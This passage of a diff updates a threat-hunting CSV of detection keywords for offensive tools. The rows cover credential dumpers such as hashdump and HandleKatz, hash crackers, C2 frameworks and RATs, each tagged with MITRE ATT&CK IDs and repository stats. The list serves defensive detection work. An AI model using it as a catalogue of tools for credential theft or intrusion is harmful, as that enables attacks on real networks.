Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" -"*hak5/omg-payloads*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*haKCers.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*hakluke/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*hakrawler -*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*hakrawler.go*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*hakrawler@latest*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hak5/omg-payloads*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*haKCers.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*hakluke/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler -*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler.go*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler@latest*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" "*hakrawler-ip-range*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*hakrawler-master*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*haktrails subdomains*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler-master*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*haktrails subdomains*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" "*Hakumarachi/Bropper*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*handelsregister-get-company-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*handle_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*handlekatz.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*handle_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*handlekatz.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*handlekatz.x64.*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*handlekatz_bof.*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","","N/A","","","" -"*handlekatz_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*HANDLEKATZ_EXE_NAME=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*handlekatz_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*HANDLEKATZ_EXE_NAME=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*Hangingsword/HouQing*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" "*HardHatC2*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*hardhatc2.com*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" @@ -11126,61 +11277,61 @@ "*hash3liZer/SillyRAT*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" "*hash3liZer/wifijammer*","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1499","TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hash3liZer/wifijammer","1","1","N/A","N/A","2","168","43","2021-06-10T12:33:49Z","2018-01-20T16:26:45Z" "*Hash-Buster*","offensive_tool_keyword","Hash-Buster","hash cracking tool ","T1201 - T1110 - T1021","TA0001 - TA0002 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/s0md3v/Hash-Buster","1","1","N/A","N/A","10","1543","392","2023-04-11T09:43:06Z","2017-07-03T17:28:51Z" -"*hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" -"*hashcat-*.7z*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" -"*hashcat.git*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" -"*hashcat/hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" -"*hashdump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashcat-*.7z*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashcat.git*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashcat/hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashdump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*hashdump_sam*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*HashDumpDCImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*HashDumpSAMImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*hasherezade/exe_to_dll*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*hasherezade/exe_to_dll*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" -"*-hashes* --escalate-user*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*-hashes* --escalate-user*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*hashonymize --ntds * --kerberoast *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*HashPals/Name-That-Hash*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*--hash-type 1000 --potfile-path*.ntds.cracked*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*hashview*@*localhost*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*hashview/config.conf*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*hashview/hashview*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*hashview-agent.*.tgz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*hashview-agent.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview*@*localhost*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview/config.conf*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview/hashview*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview-agent.*.tgz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview-agent.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" "*HasSPNNoPreauth*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - 